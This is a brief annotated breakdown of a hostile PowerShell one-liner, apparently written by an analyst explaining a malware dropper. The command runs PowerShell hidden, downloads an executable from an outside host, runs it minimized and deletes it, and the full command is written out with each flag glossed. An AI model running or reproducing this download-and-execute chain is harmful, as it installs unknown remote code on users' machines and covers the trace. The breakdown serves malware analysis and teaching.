powershell -w h <launches powershell with '-w = -WindowsStyle h = hidden'> [Net.ServicePointManager]::SecurityProtocol='tls12' <change per powershell session to allow TLS 1.2> (New-Object Net.WebClient).DownloadFile('http://p.nsa.chat','%HOMEPATH%\n.exe') <go get from web file and download it to users home and save it as n.exe> Start-Process -wai -wi mi -f '~\n.exe' <run file downloaded '-wai = wait -wi = window mi = minimized' called n.exe> Remove-Item -pa '~\n.exe <delete downloaded n.exe '-pa = -path'> exit <close powershell>